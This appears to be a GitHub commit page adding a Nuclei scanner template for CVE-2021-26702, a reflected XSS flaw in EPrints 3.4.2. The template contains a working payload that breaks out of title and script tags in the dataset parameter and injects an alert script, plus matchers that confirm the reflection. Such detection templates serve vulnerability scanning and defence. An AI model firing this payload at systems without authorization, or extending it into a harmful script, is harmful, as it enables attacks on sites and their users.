Merge pull request #4750 from projectdiscovery/CVE-2021-26702

Create CVE-2021-26702.yaml
patch-1
Prince Chaddha 2022-07-09 12:24:09 +05:30 committed by GitHub
commit fc0e40c96a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2021-26702
info:
name: EPrints 3.4.2 XSS
author: ritikchaddha
severity: medium
description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI.
reference:
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
- https://files.eprints.org/2548/
tags: cve,cve2021,xss,eprints
requests:
- method: GET
path:
- "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu</title></script><script>alert(document.domain)</script>"
matchers-condition: and
matchers:
- type: word
words:
- "</title></script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200